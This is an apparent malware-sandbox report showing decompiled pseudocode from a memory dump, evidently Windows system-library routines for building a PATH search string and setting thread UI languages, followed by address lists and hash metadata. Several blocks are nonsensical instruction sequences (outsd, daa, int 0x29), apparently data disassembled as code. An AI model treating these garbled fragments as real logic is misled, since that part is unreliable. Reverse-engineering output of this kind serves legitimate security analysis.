				_v16 = 0;
				_t343 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t282 = 0x48;
				_t312 = 0 | _t343 == 0x00000000;
				_t323 = 0;
				_v37 = _t343 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t282 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t331 = 0xc0000106;
						goto L32;
					} else {
						_t330 = L016E4620(_t292,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t282);
						_v52 = _t330;
						__eflags = _t330;
						if(_t330 == 0) {
							_t331 = 0xc0000017;
							goto L32;
						} else {
							 *(_t330 + 0x44) =  *(_t330 + 0x44) & 0x00000000;
							_t50 = _t330 + 0x48; // 0x48
							_t325 = _t50;
							_t312 = _v32;
							 *((intOrPtr*)(_t330 + 0x3c)) = _t282;
							_t284 = 0;
							 *((short*)(_t330 + 0x30)) = _v48;
							__eflags = _t312;
							if(_t312 != 0) {
								 *(_t330 + 0x18) = _t325;
								__eflags = _t312 - 0x17b8478;
								 *_t330 = ((0 | _t312 == 0x017b8478) - 0x00000001 & 0xfffffffb) + 7;
								E0170F3E0(_t325,  *((intOrPtr*)(_t312 + 4)),  *_t312 & 0x0000ffff);
								_t312 = _v32;
								_t341 = _t341 + 0xc;
								_t284 = 1;
								__eflags = _a8;
								_t325 = _t325 + (( *_t312 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t276 = E017539F2(_t325);
									_t312 = _v32;
									_t325 = _t276;
								}
							}
							_t296 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t331 = _v68;
								__eflags = 0;
								 *((short*)(_t325 - 2)) = 0;
								goto L32;
							} else {
								_t286 = _t330 + _t284 * 4;
								_v56 = _t286;
								do {
									__eflags = _t312;
									if(_t312 != 0) {
										_t240 =  *(_v60 + _t296 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t286 =  *(_v60 + _t296 * 4);
										 *(_t286 + 0x18) = _t325;
										_t244 =  *(_v60 + _t296 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M016F2959))) {
												case 0:
													__ax =  *0x17b8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0170F3E0(__edi,  *0x17b848c, __ax & 0x0000ffff);
														__eax =  *0x17b8488 & 0x0000ffff;
														goto L26;
													}
													goto L114;
												case 1:
													L45:
													E0170F3E0(_t325, _v80, _v64);
													_t271 = _v64;
													goto L26;
												case 2:
													 *0x17b8480 & 0x0000ffff = E0170F3E0(__edi,  *0x17b8484,  *0x17b8480 & 0x0000ffff);
													__eax =  *0x17b8480 & 0x0000ffff;
													__eax = ( *0x17b8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0170F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L114;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0170F3E0(_t325, _v76, _v36);
														_t271 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t325 = _t325 + (_t271 >> 1) * 2 + 2;
													__eflags = _t325;
													L27:
													_push(0x3b);
													_pop(_t273);
													 *((short*)(_t325 - 2)) = _t273;
													goto L28;
												case 6:
													__ebx =  *0x17b575c;
													__eflags = __ebx - 0x17b575c;
													if(__ebx != 0x17b575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0170F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x17b575c;
														} while (__ebx != 0x17b575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x17b8478 & 0x0000ffff = E0170F3E0(__edi,  *0x17b847c,  *0x17b8478 & 0x0000ffff);
													__eax =  *0x17b8478 & 0x0000ffff;
													__eax = ( *0x17b8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E017539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x17b6e58 & 0x0000ffff = E0170F3E0(__edi,  *0x17b6e5c,  *0x17b6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x17b6e58 & 0x0000ffff;
													__eax = ( *0x17b6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t296 = _v16;
													_t312 = _v32;
													L29:
													_t286 = _t286 + 4;
													__eflags = _t286;
													_v56 = _t286;
													goto L30;
											}
										}
									}
									goto L114;
									L30:
									_t296 = _t296 + 1;
									_v16 = _t296;
									__eflags = _t296 - _v48;
								} while (_t296 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t323 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M016F2935))) {
							case 0:
								__ax =  *0x17b8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t312 =  &_v64;
								_v80 = E016F2E3E(0,  &_v64);
								_t282 = _t282 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x17b8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x17b8480;
									goto L86;
								}
								goto L14;
							case 3:
								__eax = E016DEEF0(0x17b79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L63();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E016DEB70(__ecx, 0x17b79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t331;
												if(_t331 < 0) {
													L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t292 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x17b7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L016E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E016DEB70(__ecx, 0x17b79a0);
										__eax = _v52;
										L36:
										_pop(_t324);
										_pop(_t332);
										__eflags = _v8 ^ _t337;
										_pop(_t283);
										return E0170B640(_t219, _t283, _v8 ^ _t337, _t312, _t324, _t332);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L63();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L114;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t278 = _v56;
								if(_v56 != 0) {
									_t312 =  &_v36;
									_t280 = E016F2E3E(_t278,  &_v36);
									_t292 = _v36;
									_v76 = _t280;
								}
								if(_t292 == 0) {
									goto L44;
								} else {
									_t282 = _t282 + 2 + _t292;
								}
								goto L14;
							case 6:
								__eax =  *0x17b5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x17b8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x17b8478;
									L86:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x17b6e58 & 0x0000ffff;
								__eax = ( *0x17b6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t323 = _t323 + 1;
								if(_t323 >= _v48) {
									goto L16;
								} else {
									_t312 = _v37;
									goto L1;
								}
								goto L114;
						}
					}
					L56:
					_t297 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("outsd");
					 *((intOrPtr*)(_t330 + 0x28)) =  *((intOrPtr*)(_t330 + 0x28)) + _t341;
					asm("outsd");
					_t245 = _t244 + _t341;
					asm("daa");
					asm("outsd");
					 *_t330 =  *_t330 + _t337;
					asm("es outsd");
					 *((intOrPtr*)(_t330 + 0x28)) =  *((intOrPtr*)(_t330 + 0x28)) + _t245;
					asm("outsd");
					 *0x1f016f26 =  *0x1f016f26 + _t245;
					__eflags =  *0x1f016f26;
					_pop(_t287);
					if( *0x1f016f26 < 0) {
						_t109 = _t245;
						_t245 = _t341;
						_t341 = _t109;
					}
					 *((intOrPtr*)(_t325 + 1)) =  *((intOrPtr*)(_t325 + 1)) - _t297;
					_t246 = _t245 ^ 0x0201735b;
					 *((intOrPtr*)(_t325 + 1)) =  *((intOrPtr*)(_t325 + 1)) - _t337;
					 *_t246 =  *_t246 - 0x6f;
					_t333 = _t330 + _t330;
					asm("daa");
					asm("outsd");
					 *_t333 =  *_t333 + _t287;
					 *((intOrPtr*)(_t325 + 1)) =  *((intOrPtr*)(_t325 + 1)) - _t297;
					_t334 = _t333 - 1;
					 *((intOrPtr*)(_t325 + 1)) =  *((intOrPtr*)(_t325 + 1)) - _t297;
					asm("daa");
					asm("outsd");
					_t247 = _t246 + _t287;
					__eflags = _t247;
					_pop(_t288);
					if(_t247 < 0) {
						_t247 = 0x28;
					}
					 *((intOrPtr*)(_t325 + 1)) =  *((intOrPtr*)(_t325 + 1)) - _t297;
					__eflags = _t247 ^ 0x0000005c;
					if((_t247 ^ 0x0000005c) < 0) {
						asm("int3");
					}
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x179ff00);
					E0171D08C(_t288, _t325, _t334);
					_v44 =  *[fs:0x18];
					_t326 = 0;
					 *_a24 = 0;
					_t289 = _a12;
					__eflags = _t289;
					if(_t289 == 0) {
						_t251 = 0xc0000100;
					} else {
						_v8 = 0;
						_t335 = 0xc0000100;
						_v52 = 0xc0000100;
						_t253 = 4;
						while(1) {
							_v40 = _t253;
							__eflags = _t253;
							if(_t253 == 0) {
								break;
							}
							_t302 = _t253 * 0xc;
							_v48 = _t302;
							__eflags = _t289 -  *((intOrPtr*)(_t302 + 0x16a1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t268 = E0170E5C0(_a8,  *((intOrPtr*)(_t302 + 0x16a1668)), _t289);
									_t341 = _t341 + 0xc;
									__eflags = _t268;
									if(__eflags == 0) {
										_t335 = E017451BE(_t289,  *((intOrPtr*)(_v48 + 0x16a166c)), _a16, _t326, _t335, __eflags, _a20, _a24);
										_v52 = _t335;
										break;
									} else {
										_t253 = _v40;
										goto L68;
									}
									goto L76;
								} else {
									L68:
									_t253 = _t253 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t335;
						__eflags = _t335;
						if(_t335 < 0) {
							__eflags = _t335 - 0xc0000100;
							if(_t335 == 0xc0000100) {
								_t298 = _a4;
								__eflags = _t298;
								if(_t298 != 0) {
									_v36 = _t298;
									__eflags =  *_t298 - _t326;
									if( *_t298 == _t326) {
										_t335 = 0xc0000100;
										goto L82;
									} else {
										_t314 =  *((intOrPtr*)(_v44 + 0x30));
										_t255 =  *((intOrPtr*)(_t314 + 0x10));
										__eflags =  *((intOrPtr*)(_t255 + 0x48)) - _t298;
										if( *((intOrPtr*)(_t255 + 0x48)) == _t298) {
											__eflags =  *(_t314 + 0x1c);
											if( *(_t314 + 0x1c) == 0) {
												L112:
												_t335 = E016F2AE4( &_v36, _a8, _t289, _a16, _a20, _a24);
												_v32 = _t335;
												__eflags = _t335 - 0xc0000100;
												if(_t335 != 0xc0000100) {
													goto L75;
												} else {
													_t326 = 1;
													_t298 = _v36;
													goto L81;
												}
											} else {
												_t258 = E016D6600( *(_t314 + 0x1c));
												__eflags = _t258;
												if(_t258 != 0) {
													goto L112;
												} else {
													_t298 = _a4;
													goto L81;
												}
											}
										} else {
											L81:
											_t335 = E016F2C50(_t298, _a8, _t289, _a16, _a20, _a24, _t326);
											L82:
											_v32 = _t335;
											goto L75;
										}
									}
									goto L114;
								} else {
									E016DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t335 = _a24;
									_t265 = E016F2AE4( &_v36, _a8, _t289, _a16, _a20, _t335);
									_v32 = _t265;
									__eflags = _t265 - 0xc0000100;
									if(_t265 == 0xc0000100) {
										_v32 = E016F2C50(_v36, _a8, _t289, _a16, _a20, _t335, 1);
									}
									_v8 = _t326;
									E016F2ACB();
								}
							}
						}
						L75:
						_v8 = 0xfffffffe;
						_t251 = _t335;
					}
					L76:
					return E0171D0D1(_t251);
				}
				L114:
			}

0x016f2584
0x016f2586
0x016f2590
0x016f2596
0x016f2597
0x016f2598
0x016f2599
0x016f259e
0x016f25a4
0x016f25a9
0x016f25ac
0x016f25ae
0x016f25b1
0x016f25b2
0x016f25b5
0x016f25b8
0x016f25bb
0x016f25bc
0x016f25bf
0x016f25c2
0x016f25c5
0x016f25c6
0x016f25cb
0x016f25ce
0x016f25d8
0x016f25db
0x016f25dd
0x016f25de
0x016f25e1
0x016f25e3
0x016f25e9
0x016f26da
0x016f26da
0x016f26dd
0x016f26e2
0x01735b56
0x00000000
0x016f26e8
0x016f26f9
0x016f26fb
0x016f26fe
0x016f2700
0x01735b60
0x00000000
0x016f2706
0x016f2706
0x016f270a
0x016f270a
0x016f270d
0x016f2713
0x016f2716
0x016f2718
0x016f271c
0x016f271e
0x01735b6c
0x01735b6f
0x01735b7f
0x01735b89
0x01735b8e
0x01735b93
0x01735b96
0x01735b9c
0x01735ba0
0x01735ba3
0x01735bab
0x01735bb0
0x01735bb3
0x01735bb3
0x01735ba3
0x016f2724
0x016f2726
0x016f2729
0x016f272c
0x016f279d
0x016f279d
0x016f27a0
0x016f27a2
0x00000000
0x016f272e
0x016f272e
0x016f2731
0x016f2734
0x016f2734
0x016f2736
0x01735bc1
0x01735bc1
0x01735bc4
0x00000000
0x01735bca
0x01735bca
0x01735bcd
0x00000000
0x01735bd3
0x00000000
0x01735bd3
0x01735bcd
0x016f273c
0x016f273c
0x016f2742
0x016f2747
0x016f274a
0x016f274d
0x016f2750
0x00000000
0x016f2756
0x016f2756
0x00000000
0x016f2902
0x016f2908
0x016f290b
0x00000000
0x016f2911
0x016f291c
0x016f2921
0x00000000
0x016f2921
0x00000000
0x00000000
0x016f2880
0x016f2887
0x016f288c
0x00000000
0x00000000
0x016f2805
0x016f280a
0x016f2814
0x016f2816
0x00000000
0x00000000
0x016f281e
0x016f2821
0x016f2823
0x00000000
0x016f2829
0x016f2829
0x016f2831
0x016f283c
0x016f283e
0x00000000
0x016f283e
0x00000000
0x00000000
0x016f284e
0x016f2850
0x016f2851
0x016f2854
0x016f2857
0x016f285a
0x016f285c
0x016f285d
0x00000000
0x00000000
0x016f275d
0x016f2761
0x00000000
0x016f2767
0x016f276e
0x016f2773
0x016f2773
0x016f2776
0x016f2778
0x016f277e
0x016f277e
0x016f2781
0x016f2781
0x016f2783
0x016f2784
0x00000000
0x00000000
0x01735bd8
0x01735bde
0x01735be4
0x01735be6
0x01735be8
0x01735be9
0x01735bee
0x01735bf8
0x01735bff
0x01735c01
0x01735c04
0x01735c07
0x01735c0b
0x01735c0d
0x01735c0d
0x01735c15
0x01735c18
0x01735c1b
0x01735c1b
0x01735c1e
0x00000000
0x00000000
0x016f28c3
0x016f28c8
0x016f28d2
0x016f28d4
0x016f28d8
0x016f28db
0x01735c26
0x01735c28
0x01735c2d
0x01735c2d
0x00000000
0x00000000
0x01735c34
0x01735c36
0x01735c49
0x01735c4e
0x01735c54
0x01735c5b
0x01735c5d
0x01735c60
0x016f2788
0x016f2788
0x016f278b
0x016f278e
0x016f278e
0x016f278e
0x016f2791
0x00000000
0x00000000
0x016f2756
0x016f2750
0x00000000
0x016f2794
0x016f2794
0x016f2795
0x016f2798
0x016f2798
0x00000000
0x016f2734
0x016f272c
0x016f2700
0x016f25ef
0x016f25ef
0x016f25ef
0x016f25f2
0x016f25f8
0x00000000
0x00000000
0x016f25fe
0x00000000
0x016f28e6
0x016f28ec
0x016f28ef
0x016f28f5
0x016f28f8
0x016f28f8
0x00000000
0x016f28f8
0x00000000
0x00000000
0x016f2866
0x016f2866
0x016f2876
0x016f2879
0x00000000
0x00000000
0x016f27e0
0x016f27e7
0x016f27e9
0x016f27eb
0x01735afd
0x00000000
0x01735afd
0x00000000
0x00000000
0x016f2633
0x016f2638
0x016f263b
0x016f263c
0x016f263e
0x016f2640
0x016f2642
0x016f2647
0x016f2649
0x016f264e
0x016f2650
0x016f2653
0x016f2659
0x016f26a2
0x016f26a7
0x016f26ac
0x016f26b2
0x01735b11
0x01735b15
0x01735b17
0x00000000
0x016f26b8
0x016f26b8
0x016f26ba
0x016f27a6
0x016f27a6
0x016f27a9
0x016f27ab
0x016f27b9
0x016f27b9
0x016f27be
0x016f27c1
0x016f27c3
0x016f27c5
0x016f27c7
0x01735c74
0x01735c79
0x01735c79
0x016f27c7
0x00000000
0x016f26c0
0x016f26c0
0x016f26c3
0x016f26c6
0x016f26c6
0x016f26c9
0x016f26c9
0x00000000
0x016f26c9
0x016f26ba
0x016f265b
0x016f265b
0x016f265e
0x016f2667
0x016f266d
0x016f2677
0x016f267c
0x016f267f
0x016f2681
0x01735b49
0x01735b4e
0x016f27cd
0x016f27d0
0x016f27d1
0x016f27d2
0x016f27d4
0x016f27dd
0x016f2687
0x016f2687
0x016f268a
0x016f268b
0x016f268e
0x016f268f
0x016f2691
0x016f2696
0x016f2698
0x016f269d
0x016f269f
0x00000000
0x016f269f
0x016f2681
0x00000000
0x00000000
0x016f2846
0x00000000
0x00000000
0x016f2605
0x016f260a
0x016f260c
0x016f2611
0x016f2616
0x016f2619
0x016f2619
0x016f261e
0x00000000
0x016f2624
0x016f2627
0x016f2627
0x00000000
0x00000000
0x01735b1f
0x00000000
0x00000000
0x016f2894
0x016f289b
0x016f289d
0x016f28a1
0x01735b2b
0x01735b2e
0x01735b2e
0x016f28a7
0x016f28a9
0x01735b04
0x01735b09
0x01735b09
0x01735b09
0x00000000
0x00000000
0x01735b35
0x01735b3c
0x016f28fb
0x016f28fb
0x016f26cc
0x016f26cc
0x016f26d0
0x00000000
0x016f26d2
0x016f26d2
0x00000000
0x016f26d2
0x00000000
0x00000000
0x016f25fe
0x016f292d
0x016f292f
0x016f2930
0x016f2935
0x016f2937
0x016f2938
0x016f293b
0x016f293c
0x016f293e
0x016f293f
0x016f2940
0x016f2942
0x016f2944
0x016f2947
0x016f2948
0x016f2948
0x016f294e
0x016f294f
0x016f2951
0x016f2951
0x016f2951
0x016f2951
0x016f2952
0x016f2955
0x016f295a
0x016f295d
0x016f2960
0x016f2962
0x016f2963
0x016f2964
0x016f2966
0x016f2969
0x016f296a
0x016f296e
0x016f296f
0x016f2970
0x016f2970
0x016f2972
0x016f2973
0x016f2975
0x016f2975
0x016f2976
0x016f2979
0x016f297b
0x016f297d
0x016f297d
0x016f297e
0x016f297f
0x016f2980
0x016f2981
0x016f2982
0x016f2983
0x016f2984
0x016f2985
0x016f2986
0x016f2987
0x016f2988
0x016f2989
0x016f298a
0x016f298b
0x016f298c
0x016f298d
0x016f298e
0x016f298f
0x016f2990
0x016f2992
0x016f2997
0x016f29a3
0x016f29a6
0x016f29ab
0x016f29ad
0x016f29b0
0x016f29b2
0x01735c80
0x016f29b8
0x016f29b8
0x016f29bb
0x016f29c0
0x016f29c5
0x016f29c6
0x016f29c6
0x016f29c9
0x016f29cb
0x00000000
0x00000000
0x016f29cd
0x016f29d0
0x016f29d9
0x016f29db
0x016f29dd
0x016f2a7f
0x016f2a84
0x016f2a87
0x016f2a89
0x01735ca1
0x01735ca3
0x00000000
0x016f2a8f
0x016f2a8f
0x00000000
0x016f2a8f
0x00000000
0x016f29e3
0x016f29e3
0x016f29e3
0x00000000
0x016f29e3
0x016f29dd
0x00000000
0x016f29db
0x016f29e6
0x016f29e9
0x016f29eb
0x016f29ed
0x016f29f3
0x016f29f5
0x016f29f8
0x016f29fa
0x016f2a97
0x016f2a9a
0x016f2a9d
0x016f2add
0x00000000
0x016f2a9f
0x016f2aa2
0x016f2aa5
0x016f2aa8
0x016f2aab
0x01735cab
0x01735caf
0x01735cc5
0x01735cda
0x01735cdc
0x01735cdf
0x01735ce5
0x00000000
0x01735ceb
0x01735ced
0x01735cee
0x00000000
0x01735cee
0x01735cb1
0x01735cb4
0x01735cb9
0x01735cbb
0x00000000
0x01735cbd
0x01735cbd
0x00000000
0x01735cbd
0x01735cbb
0x016f2ab1
0x016f2ab1
0x016f2ac4
0x016f2ac6
0x016f2ac6
0x00000000
0x016f2ac6
0x016f2aab
0x00000000
0x016f2a00
0x016f2a09
0x016f2a0e
0x016f2a21
0x016f2a24
0x016f2a35
0x016f2a3a
0x016f2a3d
0x016f2a42
0x016f2a59
0x016f2a59
0x016f2a5c
0x016f2a5f
0x016f2a5f
0x016f29fa
0x016f29f3
0x016f2a64
0x016f2a64
0x016f2a6b
0x016f2a6b
0x016f2a6d
0x016f2a72
0x016f2a72
0x00000000

Strings

PATH, xrefs: 016F2642, 016F2691

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: bd06ff15f5578189bae64445071791fa3d11a09d0c2d357e5e4b807a5fef5942
Instruction ID: d3c0ac13d5f3d95d171a1d61d257b1f8cec76c8247d89ad87927dbf37e3778c2
Opcode Fuzzy Hash: bd06ff15f5578189bae64445071791fa3d11a09d0c2d357e5e4b807a5fef5942
Instruction Fuzzy Hash: D7C159B1E002199BDB25DF99DC91BBEBBB5BF48710F14402DEA01AB290D774E942CF64

Uniqueness

Uniqueness Score: -1.00%

Function 016FFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E016FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E016DEEF0(0x17b7b60);
					_t134 =  *0x17b7b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x17b7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x17b7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E016D6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E016D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01768938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E016CB150();
													}
													_t116 = E01766D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E016D75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x17b8638; // 0x0
																	_t122 = L016D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E016D76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E016D76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L016FFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
